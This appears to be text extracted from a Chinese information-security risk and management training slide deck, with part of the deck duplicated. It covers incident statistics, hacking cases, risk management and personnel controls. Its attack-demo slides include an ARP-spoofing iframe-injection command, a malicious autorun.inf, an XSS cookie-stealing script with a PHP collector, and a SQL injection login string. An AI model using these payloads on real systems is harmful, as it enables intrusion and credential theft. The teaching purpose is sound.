信息安全风险及分析教材课件

信息安全风险及分析主讲：高显嵩Email：gaoxiansong@信息安全风险及分析主讲：高显嵩1个人介绍

高显嵩工作经历：中国“互联网信息安全与政府监管”专家组成员中国法证技术研究组成员北京司法局电子数据鉴定协会理事北京广播电视大学特聘专家原微软公司的技术支持工程师项目背景劳动部全国民办中介机构信用等级评定系统劳动部全国知识竞赛评分系统劳动部七个功能平台合并方案北京统计局的报表打印系统北京电大一站式平台合并的规划及实施为考研在线提供整体安全解决方安及实施为国家电力部内部网络设计安全解决方安及实施鞍山移动公司网络规划长期负责北京市安全局国家安全部内部技术培训负责华彬大厦的整个网络规划及实施美国百麦公司北京分公司的整个网络规划及实施个人介绍高显嵩工作经历：2主要内容信息安全的重要性信息安全问题分析信息安全管理概述信息安全风险管理信息安全人员管理主要内容信息安全的重要性3信息安全重要性信息安全重要性4当前我国网络信息安全的状况网络及计算机病毒传播泛滥垃圾邮件和病毒邮件泛滥黑客攻击事件频繁用户的个人隐私及计算机的使用权受到侵犯网络犯罪事件频繁监管力度不够涉及版权问题的事件增多没有统一完善的适合国情的安全标准及法规没有职责分明的管理部门或管理小组制约与网络基础设施和技术环境安全体系不健全全民安全意识及计算机网络知识薄弱当前我国网络信息安全的状况网络及计算机病毒传播泛滥5CERT有关信息安全的统计CERT有关信息安全的统计6CERT有关信息安全的统计CERT有关信息安全的统计7CERT有关信息安全的统计CERT有关信息安全的统计8网络病毒传播泛滥据2001年调查，我国约73%的计算机用户曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用户高达59%，而且病毒的破坏性较大，被病毒破坏全部数据的占14%，破坏部分数据的占57%。对病毒的预防和发现速度相对缓慢垃圾邮件及病毒邮件泛滥网络病毒传播泛滥据2001年调查，我国约73%的计算机用户曾9黑客离我们很近1996年信息安全数据显示，世界上平均每２０秒就有一起黑客事件发生，无论是政府机构、军事部门，还是各大银行、大公司，只要与互联网接轨，就难逃黑客的“黑手”。据美国网络安全公司Sophos发布的报告显示，在2008年第一季度，平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。中国网民每年被网络黑客“黑”掉76亿元。黑客离我们很近1996年信息安全数据显示，世界上平均每２０秒10FBI计算机犯罪调查报告2002年503家机构中，有60%受到了攻击2002年其中223家（占503家的44%）损失的总和达到$4.55848亿2003年530家机构中有75%（398家）在年内受到了攻击2003年251家（占530家的47%）的经济损失总和为$2.01799734亿FBI计算机犯罪调查报告2002年503家机构中，有60%受11全球信息安全损失数额：

年份损失额199936亿美元200042亿美元2001129亿美元

2002超过200亿美元2003超过280亿美元全球信息安全损失数额：年份损失额199936亿美元200012中国已成为全球黑客的第三大来源地

有关统计数据显示，目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入，受害涉及的覆盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出，中国甚至已经成为全球黑客的第三大来源地，竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面，我国却缺乏像西方发达国家那样健全的防范措施。中国已成为全球黑客的第三大来源地有关统计数13信息安全风险及分析教材课件14信息安全风险及分析教材课件15信息安全风险及分析教材课件162003年黑客事件中韩新人王网上对抗遭黑客入侵推迟10多分钟中韩围棋新人王对抗赛在中国的新浪网和韩国ｃｙｂｅｒ网站落子，孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前，由于有人以孔杰的名字入侵比赛的服务器，导致比赛推迟了１０多分钟才正常进行。2003年黑客事件中韩新人王网上对抗遭黑客入侵推迟10多分172003年黑客事件百度连续遭遇严重黑客攻击5月15日至5月18日，中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍，自5月15日22:00起，百度的检索量突然大增，此番增长并未引起工程师注意。5月16日，攻击更加强烈，每秒钟攻击次数搞到达1000次，同一个词被查询次数最多达38863次。据互联网技术专家介绍，每秒钟攻击100次就已经属于非常严重的攻击，而每秒钟1000次的攻击就实属罕见2003年黑客事件百度连续遭遇严重黑客攻击182003年黑客事件263游戏论坛遭黑客攻击关闭2003年黑客事件263游戏论坛遭黑客攻击关闭192004年黑客事件腾讯服务器被攻击

10月17日早上10时许，国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露，一国内团体，利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用，腾讯QQ不予理睬后，该组织于17日正式发动攻击，腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速，业内有部分安全管理人士称网络进入软件绑架勒索时代。2004年黑客事件腾讯服务器被攻击202004年黑客事件江民网站被攻击

2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一名为河马史诗的黑客攻破，页面内容被篡改。攻击缘由：江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”，用户在江民公司的官方论坛发反映后，江民没有做出及时的回复，也没能在短时间内解决用户的问题。2004年黑客事件江民网站被攻击212005年黑客事件频繁

也许你的计算机正在被当作从事违法犯罪活动的工具，而当这些悄悄发生的时候，你却一无所知，因为你的电脑已经成为被别人控制的“僵尸电脑”。2005年黑客事件频繁也许你的计算机正在222005年黑客事件国内首起僵尸网络事件今年27岁的徐立系唐山市某企业工人，其利用某些手段在互联网上传播其编写的特定程序，先后植入4万余台计算机，形成了中国首例BOTNET“僵尸网络。

2004年10月至2005年1月，徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网（简称酷乐），发动多次攻击，致使该公司蒙受重大经济损失，并导致北京电信数据中心某机房网络设备大面积瘫痪。2005年黑客事件国内首起僵尸网络事件232006年黑客事件2006年12月31日中国工商银行被黑06年的最后一天，很多网友都收到一些号称“工行要倒闭，所有存款均没收”之类的新闻链接，地址都是正牌的，而不是盗版的1。原来工商被黑客入侵，截止当天晚上11点，发现此漏洞已经修改好。2006年黑客事件2006年12月31日中国工商银行被黑2407年第一黑客事件深圳律师网被黑当进入该网站之后，就发生事故了，发现，已经被黑.主要有以下字样：天空未留痕迹,鸟儿却已飞过.网络亦是虚拟,疯狂亦是叛逆.

.......~~~尊敬的網站管理員您好~~~.....................台湾是中国的，日本是吃S的...........................如果你是中国人......................请保留此页几天谢谢!.........

少年★浪子所向披靡OICQ1188895607年第一黑客事件深圳律师网被黑25例子：得到本地登录密码Pulist.exe+findpass.exePasswordReminder.exe例子：得到本地登录密码Pulist.exe+findpass26例子：记录本地登录密码GINAPassWordSniffer例子：记录本地登录密码GINAPassWordSniff27例子得到远程计算机的密码IpcScan2.0例子得到远程计算机的密码IpcScan2.028例子：更改本地管理员密码WindowsNT/2000/XP/2003/Linux/Unix系统，本地接触可以更改任意用户的密码。一张软盘更改本地管理员密码Ntpassword一张光盘更改本地管理员密码ERDCommander2003例子：更改本地管理员密码WindowsNT/2000/XP/29例子：ERDCOMMANDER例子：ERDCOMMANDER30例子：ERDCOMMANDER例子：ERDCOMMANDER31例子：得到他人的邮件密码密码监听器2.8例子：得到他人的邮件密码密码监听器2.832通过监听得到密码通过监听得到密码33通过监听得到密码通过监听得到密码34通过监听得到密码通过监听得到密码35例子：内网渗透ZXARPS.EXE内网主机访问任意站点被入侵指定的IP段中的用户访问的所有网站都插入一个框架代码

zxarps.exe-idx0-ip-9-port80-insert"<iframesrc=‘/backdoor.htm'width=0height=0>"例子：内网渗透ZXARPS.EXE内网主机访问任意站点被入36ARP协议工作原理ARP协议工作原理37ARP欺骗交换机ARP欺骗交换机38ARP欺骗计算机ARP欺骗计算机39例子：内网U盘感染U盘在互联网和局域网内交叉使用文件被盗取Autorun.infautorun风暴[autorun]open=shell\open=打开(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=资源管理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs例子：内网U盘感染U盘在互联网和局域网内交叉使用文件被盗取40例子：查看网络内任何人的上网记录any@web2.54可以记录同一局域网内任何计算机上浏览的网页内容，察看的邮箱内容，登陆的ftp的内容。用Outlook或者OutlookExpress接受的全部邮件都回同时被该软件接收。例子：查看网络内任何人的上网记录any@web2.5441信息安全风险及分析教材课件42例子：查看MSN密码例子：查看MSN密码43例子：察看星号密码例子：察看星号密码44例子：读取缓存密码例子：读取缓存密码45例子：控制他人计算机Dameware4.5RemoteAdministrator2.1是一种网络管理软件，但是经常被黑客利用来远程控制和管理，被入侵者的计算机。例子：控制他人计算机Dameware4.546信息安全风险及分析教材课件47信息安全风险及分析教材课件48例子：打开对方摄像头和语音例子：打开对方摄像头和语音49SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击50SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击51SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击52SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击53SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击54SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击55SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击56SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击57SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击58XSS跨站脚本构建了个Javascript脚本传递客户端的cookie到黑客的服务器Javascript脚本可以简单的这样写

varimg=newImage();

img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);

然后服务器端使用PHP简单写了个脚本保存Cookie数据

<?php

if(isset($_GET[‘var’])){

file_put_contents(‘./cookie/’.time().‘.txt’,urldecode($_GET[‘var’]));

}?>

XSS跨站脚本构建了个Javascript脚本传递客户59构造SQL登陆语句用户名:admin密码:1’or‘1’=‘1构造SQL登陆语句用户名:admin60其他例子击键记录Office文档挂栽木马网页木马木马捆绑其他例子击键记录61信息安全管理概述信息安全管理概述62

例一：局域网内病毒泛滥成灾。例二：网络中为什么会有ARP欺骗的问题发生

例三：局域网内计算机故障频繁发生例四：为什么要给每个用户管理员权限先来分析两个例子例一：先来分析两个例子63信息安全的成败取决于两个因素：技术和管理。技术是信息安全的构筑材料，管理是真正的粘合剂和催化剂。人们常说，三分技术，七分管理，可见管理对信息安全的重要性。信息安全管理（InformationSecurityManagement）作为组织完整的管理体系中一个重要的环节，它构成了信息安全具有能动性的部分，是指导和控制组织的关于信息安全风险的相互协调的活动，其针对对象就是组织的信息资产。现实世界里大多数安全事件的发生和安全隐患的存在，与其说是技术上的原因，不如说是管理不善造成的，理解并重视管理对于信息安全的关键作用，对于真正实现信息安全目标来说尤其重要。什么是信息安全管理？信息安全的成败取决于两个因素：技术和管理。什么是信息安64

根据风险评估结果、法律法规要求、组织业务运作自身需要来确定控制目标与控制措施。

实施所选的安全控制措施。

针对检查结果采取应对措施，改进安全状况。

依据策略、程序、标准和法律法规，对安全措施的实施情况进行符合性检查。信息安全管理模型根据风险评估结果、法律法规要求、组织业务运作自65信息安全必须从整体考虑，必须做到“有计划有目标、发现问题、分析问题、采取措施解决问题、后续监督避免再现”这样全程管理的思路，这就要求建立的是一套完整的信息安全管理体系，这样的系统工程，只有处于组织最高管理者领导和支持之下，才可能成功最高管理层通过明确信息安全目标和方针为信息安全活动指引方向最高管理层能够为信息安全活动提供必要的资源支持最高管理层能够在重大问题上做出决策最高管理层可以协调组织不同单位不同环节的关系，提升促动力说到底，最高管理者是组织信息安全的最终责任人组织高管全面负责信息安全管理信息安全必须从整体考虑，必须做到“有计划有目标、发现问题66制定有效的安全管理计划，可以确保信息安全策略得到恰当执行进行有效安全管理的途径，应该是自上而下的（Top-Down）：最高管理层负责启动并定义组织的安全方针管理中层负责将安全策略充实成标准、基线、指南和程序，并监督执行业务经理或安全专家负责实施安全管理文件中的指定配置最终用户负责遵守组织所有的安全策略安全管理计划小组应该开发三类计划：战略计划（strategicplan）是长期计划（例如5年），相对稳定，定义了组织的目标和使命

战术计划（tacticalplan）是中期计划（例如1年），是对实现战略计划中既定目标的任务和进度的细节描述，例如雇用计划、预算计划、维护计划、系统开发计划等

操作计划（operationalplan）是短期的高度细化的计划，须经常更新（每月或每季度），例如培训计划、系统部署计划、产品设计计划等按计划行事制定有效的安全管理计划，可以确保信息安全策略得到恰当执行67数据收集者（DataCollector）对数据主体（DataSubject）：准确（Accuracy）、隐私（Privacy）；数据保管者（DataCustodian）对数据拥有者（DataOwner）：可用性（Availability）、完整性（Integrity）、保密性（Confidentiality）；数据用户（DataUsers）对拥有者/主体（Owner/Subject）：保密性（Confidentiality）和完整性；系统用户（SystemUsers）对系统拥有者（SystemOwner）：可用性（Availability）和软件完整性（SoftwareIntegrity）；系统管理者（SystemManager）对用户（Users），可用性（Integrity）、完整性（Integrity）；用户（Users）对其它用户（OtherUsers）：可用性（Availability）。重要角色和职责数据收集者（DataCollector）对数据主体（D68信息安全管风险管理信息安全管风险管理69风险

风险管理（RiskManagement）就是识别风险、评估风险、采取措施将风险减少到可接受水平，并维持这个风险水平的过程。风险管理是信息安全管理的核心内容。在信息安全领域，风险（Risk）就是指信息资产遭受损坏并给企业带来负面影响的潜在可能性。风险管理风险管理概述风险风险管理（RiskManagement）就是识70资产（Asset）——对组织具有价值的信息资产，包括计算机硬件、通信设施、数据库、文档信息、软件、信息服务和人员等，所有这些资产都需要妥善保护。威胁（Threat）——可能对资产或组织造成损害的某种安全事件发生的潜在原因，需要识别出威胁源（Threatsource）或威胁代理（Threatagent）。弱点（Vulnerability）——也被称作漏洞或脆弱性，即资产或资产组中存在的可被威胁利用的缺点，弱点一旦被利用，就可能对资产造成损害。风险（Risk）——特定威胁利用资产弱点给资产或资产组带来损害的潜在可能性。可能性（Likelihood）——对威胁发生几率（Probability）或频率（Frequency）的定性描述。影响（Impact）——后果（Consequence），意外事件发生给组织带来的直接或间接的损失或伤害。安全措施（Safeguard）——控制（control）或对策（countermeasure），即通过防范威胁、减少弱点、限制意外事件带来影响等途径来消减风险的机制、方法和措施。残留风险（ResidualRisk）——在实施安全措施之后仍然存在的风险。风险管理相关要素资产（Asset）——对组织具有价值的信息资产，包括71风险RISKRISKRISKRISK风险基本的风险采取措施后剩余的风险资产威胁弱点资产威胁弱点风险管理的目标风险RISKRISKRISKRISK风险基本的风险采取措施后72安全控制的成本安全事件造成的损失最小化的总成本低高高安全成本/损失所提供的安全水平关键是达成成本利益的平衡安全控制的成本安全事件造成的损失最小化的总成本低高高安全成本73识别并评价资产识别并评估威胁识别并评估弱点现有控制确认风险评价接受保持现有控制确定风险消减策略选择控制目标和控制方式实施选定的控制YesNo确认并评估残留风险定期评估风险评估风险消减风险接受及控制风险管理风险管理的一般过程识别并评价资产识别并评估威胁识别并评估弱点现有控制确认风险评74风险评估（RiskAssessment）是对信息资产及其价值、面临的威胁、存在的弱点，以及三者综合作用而带来风险的大小或水平的评估。作为风险管理的基础，风险评估是组织确定信息安全需求的一个重要途径，属于组织信息安全管理体系策划的过程。主要任务包括：识别构成风险的各种因素评估风险发生的可能性和造成的影响，并最终评价风险水平或大小确定组织承受风险的能力确定风险消减和控制的策略、目标和优先顺序推荐风险消减对策以供实施包括风险分析（RiskAnalysis）和风险评价（RiskEvaluation）两部分，但一般来说，风险评估和风险分析同义。什么是风险评估？风险评估（RiskAssessment）是对信息资产及75降低风险（ReduceRisk）——实施有效控制，将风险降低到可接受的程度，实际上就是力图减小威胁发生的可能性和带来的影响，包括：减少威胁：例如，实施恶意软件控制程序，减少信息系统受恶意软件攻击的机会减少弱点：例如，通过安全意识培训，强化职员的安全意识与安全操作能力降低影响：例如，制定灾难恢复计划和业务连续性计划，做好备份规避风险（AvoidRisk）——或者RejectingRisk。有时候，组织可以选择放弃某些可能引来风险的业务或资产，以此规避风险。例如，将重要的计算机系统与互联网隔离，使其免遭来自外部网络的攻击。转嫁风险（TransferRisk）——也称作RiskAssignment。将风险全部或者部分地转移到其他责任方，例如购买商业保险。接受风险（AcceptRisk）——在实施了其他风险应对措施之后，对于残留的风险，组织可以选择接受。确定风险消减策略降低风险（ReduceRisk）——实施有效控制，将76绝对安全（即零风险）是不可能的。实施安全控制后会有残留风险或残存风险（ResidualRisk）。为了实现信息安全，应该确保残留风险在可接受的范围内：残留风险Rr＝原有风险R0－控制效力ΔR残留风险Rr≤可接受的风险Rt对残留风险进行确认和评价的过程其实就是风险接受的过程。决策者可以根据风险评估的结果来确定一个阀值，以该阀值作为是否接受残留风险的标准。评价残留风险绝对安全（即零风险）是不可能的。评价残留风险77信息安全人员管理信息安全人员管理78人是信息安全的关键因素，人员管理不善会给组织带来非常大的安全威胁和风险。有调查显示，大多数重大信息安全事件通常都来自组织内部，例如，员工受利益驱使将公司技术图纸出卖给竞争对手，利用内部系统从事经济犯罪活动，或者由于缺乏安全意识或操作技能而导致误操作，引起信息系统故障等。为降低内部员工所带来的人为差错、盗窃、欺诈及滥用设施的风险，并且避免引发法律风险，组织应该采取措施，加强内部人员的安全管理：对工作申请者实施背景检查签署雇用合同和保密协议加强在职人员的安全管理严格控制人员离职程序必须高度重视人员安全问题人是信息安全的关键因素，人员管理不善会给组织带来非常大的79背景检查是工作申请过程的一个部分，组织至少会审查申请人简历中的基本信息。对于敏感职位，可能还会考虑进一步的调查。调查过程中，组织可以请求访问申请人的信用和犯罪记录，甚至可以聘请外部公司对申请人进行调查，以确定是否存在潜在问题或利益冲突。通过背景检查，可以防止：因为人员解雇而导致法律诉讼因为雇用疏忽而导致第三方的法律诉讼雇用不合格的人员丧失商业秘密员工从一般岗位转入信息安全重要岗位，组织也应当对其进行检查，对于处在有相当权力位置的人员，这种检查应定期进行。背景检查（BACKGROUNDCHECK）背景检查是工作申请过程的一个部分，组织至少会审查申请人简80组织应与所有员工签订保密协议，作为雇用合同基本条款的一部分保密协议应明确规定雇员对组织信息安全的责任、保密要求及违约的法律责任签订保密承诺旨在加强员工对组织信息安全应承担的责任，协议上应有员工的签名并由其保存一份协议副本对于处于试用期的新员工，要求其签订一份保密承诺在允许第三方用户使用信息处理设施之前，要求其签订保密协议当雇用期或合同期有更改，特别是雇员到期离职或合同终止时，应重申保密协议保密协议（CONFIDENTIALITYAGREEMENT）组织应与所有员工签订保密协议，作为雇用合同基本条款的一部81职务分离（SeparationofDuties），将一个关键任务分成多个不同的部分，每个部分由不同的人执行。共谋（Collusion），进行欺诈（Fraud）需要多个人共谋。目的：制约，减少人为破坏的几率。补充，减少人为疏忽和错误的几率。

职务分离职务分离（SeparationofDuties），将82将操作人员（Operator）分割为分离角色（Roles）的原因是：不同安全相关任务所需技能（Skills）不同将管理员（Administrators）任务分成多个角色以赋予不同信任级别（Trustlevels）防止将所有安全相关功能委托给一个角色或人员的需要这些角色可以包括安全管理员（SecurityAdministrators）、安全操作员（SecurityOperators）、帐户管理员（AccountAdministrators）、审计员（Auditors）、操作员（Operators）、系统程序员（SystemProgrammers）等。操作人员的角色分离将操作人员（Operator）分割为分离角色（Roles83一个人担任某个职位的时间不能过长避免过度控制（ExcessiveControl）造成欺诈（Fraud）的便利继任人员可能发现前任问题形成制约工作轮换（JobRotation），有不止一个人能够完成该职位所规定的工作提供人员的备份（Backup）和冗余（Redundancy）工作轮换一个人担任某个职位的时间不能过长工作轮换84强制假期（MandatoryVacation）具有强制性，在休假期间对休假人进行审计（Audit）以便发现可能存在的问题。强制假期（MandatoryVacation）具有突然性（Unexpected），使欺诈者（Fraud）没有时间来掩盖欺诈痕迹。欺诈者为了避免他人发现其行为，可能长期主动放弃休假。强制假期强制假期（MandatoryVacation）具有强制85人员离职往往存在安全风险，特别是雇员主动辞职时解雇通知应选择恰当的时机，例如重要项目结束，或新项目启动前使用标准的检查列表（Checklist）来实施离职访谈离职者需在陪同下清理个人物品确保离职者返还所有的公司证章、ID、钥匙等物品与此同时，立即消除离职者的访问权限，包括：解除对系统、网络和物理设施的访问权解除电话，注销电子邮箱，锁定Internet账号通知外部伙伴或客户，声明此人已离职人员离职（TERMINATION）人员离职往往存在安全风险，特别是雇员主动辞职时人员离职（86谢谢大家！谢谢大家！87讨论！！讨论！！88演讲完毕，谢谢观看！演讲完毕，谢谢观看！89信息安全风险及分析主讲：高显嵩Email：gaoxiansong@信息安全风险及分析主讲：高显嵩90个人介绍

高显嵩工作经历：中国“互联网信息安全与政府监管”专家组成员中国法证技术研究组成员北京司法局电子数据鉴定协会理事北京广播电视大学特聘专家原微软公司的技术支持工程师项目背景劳动部全国民办中介机构信用等级评定系统劳动部全国知识竞赛评分系统劳动部七个功能平台合并方案北京统计局的报表打印系统北京电大一站式平台合并的规划及实施为考研在线提供整体安全解决方安及实施为国家电力部内部网络设计安全解决方安及实施鞍山移动公司网络规划长期负责北京市安全局国家安全部内部技术培训负责华彬大厦的整个网络规划及实施美国百麦公司北京分公司的整个网络规划及实施个人介绍高显嵩工作经历：91主要内容信息安全的重要性信息安全问题分析信息安全管理概述信息安全风险管理信息安全人员管理主要内容信息安全的重要性92信息安全重要性信息安全重要性93当前我国网络信息安全的状况网络及计算机病毒传播泛滥垃圾邮件和病毒邮件泛滥黑客攻击事件频繁用户的个人隐私及计算机的使用权受到侵犯网络犯罪事件频繁监管力度不够涉及版权问题的事件增多没有统一完善的适合国情的安全标准及法规没有职责分明的管理部门或管理小组制约与网络基础设施和技术环境安全体系不健全全民安全意识及计算机网络知识薄弱当前我国网络信息安全的状况网络及计算机病毒传播泛滥94CERT有关信息安全的统计CERT有关信息安全的统计95CERT有关信息安全的统计CERT有关信息安全的统计96CERT有关信息安全的统计CERT有关信息安全的统计97网络病毒传播泛滥据2001年调查，我国约73%的计算机用户曾感染病毒，2003年上半年升至83%。其中，感染3次以上的用户高达59%，而且病毒的破坏性较大，被病毒破坏全部数据的占14%，破坏部分数据的占57%。对病毒的预防和发现速度相对缓慢垃圾邮件及病毒邮件泛滥网络病毒传播泛滥据2001年调查，我国约73%的计算机用户曾98黑客离我们很近1996年信息安全数据显示，世界上平均每２０秒就有一起黑客事件发生，无论是政府机构、军事部门，还是各大银行、大公司，只要与互联网接轨，就难逃黑客的“黑手”。据美国网络安全公司Sophos发布的报告显示，在2008年第一季度，平均每5秒钟就会有一个网页成为黑客们的“盘中餐”。中国网民每年被网络黑客“黑”掉76亿元。黑客离我们很近1996年信息安全数据显示，世界上平均每２０秒99FBI计算机犯罪调查报告2002年503家机构中，有60%受到了攻击2002年其中223家（占503家的44%）损失的总和达到$4.55848亿2003年530家机构中有75%（398家）在年内受到了攻击2003年251家（占530家的47%）的经济损失总和为$2.01799734亿FBI计算机犯罪调查报告2002年503家机构中，有60%受100全球信息安全损失数额：

年份损失额199936亿美元200042亿美元2001129亿美元

2002超过200亿美元2003超过280亿美元全球信息安全损失数额：年份损失额199936亿美元2000101中国已成为全球黑客的第三大来源地

有关统计数据显示，目前我国95%的与因特网相联的网络管理中心都遭到过国境内外黑客的攻击或侵入，受害涉及的覆盖面越来越大、程度越来越深。据国际互联网保安公司Symantec年的报告指出，中国甚至已经成为全球黑客的第三大来源地，竟然有6.9%的攻击国际互联网活动都是由中国发出的。然而面对这种局面，我国却缺乏像西方发达国家那样健全的防范措施。中国已成为全球黑客的第三大来源地有关统计数102信息安全风险及分析教材课件103信息安全风险及分析教材课件104信息安全风险及分析教材课件1052003年黑客事件中韩新人王网上对抗遭黑客入侵推迟10多分钟中韩围棋新人王对抗赛在中国的新浪网和韩国ｃｙｂｅｒ网站落子，孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前，由于有人以孔杰的名字入侵比赛的服务器，导致比赛推迟了１０多分钟才正常进行。2003年黑客事件中韩新人王网上对抗遭黑客入侵推迟10多分1062003年黑客事件百度连续遭遇严重黑客攻击5月15日至5月18日，中文搜索网站百度遭到中国互联网有史以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍，自5月15日22:00起，百度的检索量突然大增，此番增长并未引起工程师注意。5月16日，攻击更加强烈，每秒钟攻击次数搞到达1000次，同一个词被查询次数最多达38863次。据互联网技术专家介绍，每秒钟攻击100次就已经属于非常严重的攻击，而每秒钟1000次的攻击就实属罕见2003年黑客事件百度连续遭遇严重黑客攻击1072003年黑客事件263游戏论坛遭黑客攻击关闭2003年黑客事件263游戏论坛遭黑客攻击关闭1082004年黑客事件腾讯服务器被攻击

10月17日早上10时许，国内各地网民陆续腾讯QQ无法登陆。据腾讯QQ内部技术人员透露，一国内团体，利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为“修复”费用，腾讯QQ不予理睬后，该组织于17日正式发动攻击，腾讯QQ服务器在1个小时内大面积出现故障,不得不全面终止进行抢修.本次行动组织严谨、操作迅速，业内有部分安全管理人士称网络进入软件绑架勒索时代。2004年黑客事件腾讯服务器被攻击1092004年黑客事件江民网站被攻击

2004年10月17日国内著名的杀毒软件厂商江民公司的网站被一名为河马史诗的黑客攻破，页面内容被篡改。攻击缘由：江民公司的最新杀毒软件产品KV2005的升级导致用户在上网时无法打开“邮件监控和网页监控”，用户在江民公司的官方论坛发反映后，江民没有做出及时的回复，也没能在短时间内解决用户的问题。2004年黑客事件江民网站被攻击1102005年黑客事件频繁

也许你的计算机正在被当作从事违法犯罪活动的工具，而当这些悄悄发生的时候，你却一无所知，因为你的电脑已经成为被别人控制的“僵尸电脑”。2005年黑客事件频繁也许你的计算机正在1112005年黑客事件国内首起僵尸网络事件今年27岁的徐立系唐山市某企业工人，其利用某些手段在互联网上传播其编写的特定程序，先后植入4万余台计算机，形成了中国首例BOTNET“僵尸网络。

2004年10月至2005年1月，徐立操纵“僵尸网络”对北京大吕黄钟电子商务有限公司所属音乐网站北京飞行网（简称酷乐），发动多次攻击，致使该公司蒙受重大经济损失，并导致北京电信数据中心某机房网络设备大面积瘫痪。2005年黑客事件国内首起僵尸网络事件1122006年黑客事件2006年12月31日中国工商银行被黑06年的最后一天，很多网友都收到一些号称“工行要倒闭，所有存款均没收”之类的新闻链接，地址都是正牌的，而不是盗版的1。原来工商被黑客入侵，截止当天晚上11点，发现此漏洞已经修改好。2006年黑客事件2006年12月31日中国工商银行被黑11307年第一黑客事件深圳律师网被黑当进入该网站之后，就发生事故了，发现，已经被黑.主要有以下字样：天空未留痕迹,鸟儿却已飞过.网络亦是虚拟,疯狂亦是叛逆.

.......~~~尊敬的網站管理員您好~~~.....................台湾是中国的，日本是吃S的...........................如果你是中国人......................请保留此页几天谢谢!.........

少年★浪子所向披靡OICQ1188895607年第一黑客事件深圳律师网被黑114例子：得到本地登录密码Pulist.exe+findpass.exePasswordReminder.exe例子：得到本地登录密码Pulist.exe+findpass115例子：记录本地登录密码GINAPassWordSniffer例子：记录本地登录密码GINAPassWordSniff116例子得到远程计算机的密码IpcScan2.0例子得到远程计算机的密码IpcScan2.0117例子：更改本地管理员密码WindowsNT/2000/XP/2003/Linux/Unix系统，本地接触可以更改任意用户的密码。一张软盘更改本地管理员密码Ntpassword一张光盘更改本地管理员密码ERDCommander2003例子：更改本地管理员密码WindowsNT/2000/XP/118例子：ERDCOMMANDER例子：ERDCOMMANDER119例子：ERDCOMMANDER例子：ERDCOMMANDER120例子：得到他人的邮件密码密码监听器2.8例子：得到他人的邮件密码密码监听器2.8121通过监听得到密码通过监听得到密码122通过监听得到密码通过监听得到密码123通过监听得到密码通过监听得到密码124例子：内网渗透ZXARPS.EXE内网主机访问任意站点被入侵指定的IP段中的用户访问的所有网站都插入一个框架代码

zxarps.exe-idx0-ip-9-port80-insert"<iframesrc=‘/backdoor.htm'width=0height=0>"例子：内网渗透ZXARPS.EXE内网主机访问任意站点被入125ARP协议工作原理ARP协议工作原理126ARP欺骗交换机ARP欺骗交换机127ARP欺骗计算机ARP欺骗计算机128例子：内网U盘感染U盘在互联网和局域网内交叉使用文件被盗取Autorun.infautorun风暴[autorun]open=shell\open=打开(&O)shell\open\Command=WScript.exe.\autorun.vbsshell\open\Default=1shell\explore=资源管理器(&X)shell\explore\Command=WScript.exe.\autorun.vbs例子：内网U盘感染U盘在互联网和局域网内交叉使用文件被盗取129例子：查看网络内任何人的上网记录any@web2.54可以记录同一局域网内任何计算机上浏览的网页内容，察看的邮箱内容，登陆的ftp的内容。用Outlook或者OutlookExpress接受的全部邮件都回同时被该软件接收。例子：查看网络内任何人的上网记录any@web2.54130信息安全风险及分析教材课件131例子：查看MSN密码例子：查看MSN密码132例子：察看星号密码例子：察看星号密码133例子：读取缓存密码例子：读取缓存密码134例子：控制他人计算机Dameware4.5RemoteAdministrator2.1是一种网络管理软件，但是经常被黑客利用来远程控制和管理，被入侵者的计算机。例子：控制他人计算机Dameware4.5135信息安全风险及分析教材课件136信息安全风险及分析教材课件137例子：打开对方摄像头和语音例子：打开对方摄像头和语音138SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击139SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击140SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击141SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击142SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击143SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击144SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击145SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击146SQLINJECTION针对网站的攻击SQLINJECTION针对网站的攻击147XSS跨站脚本构建了个Javascript脚本传递客户端的cookie到黑客的服务器Javascript脚本可以简单的这样写

varimg=newImage();

img.src=‘get_cookie.php?var=’+encodeURI(document.cookie);

然后服务器端使用PHP简单写了个脚本保存Cookie数据

<?php

if(isset($_GET[‘var’])){

file_put_contents(‘./cookie/’.time().‘.txt’,urldecode($_GET[‘var’]));

}?>

XSS跨站脚本构建了个Javascript脚本传递客户148构造SQL登陆语句用户名:admin密码:1’or‘1’=‘1构造SQL登陆语句用户名:admin149其他例子击键记录Office文档挂栽木马网页木马木马捆绑其他例子击键记录150信息安全管理概述信息安全管理概述151

例一：局域网内病毒泛滥成灾。例二：网络中为什么会有ARP欺骗的问题发生

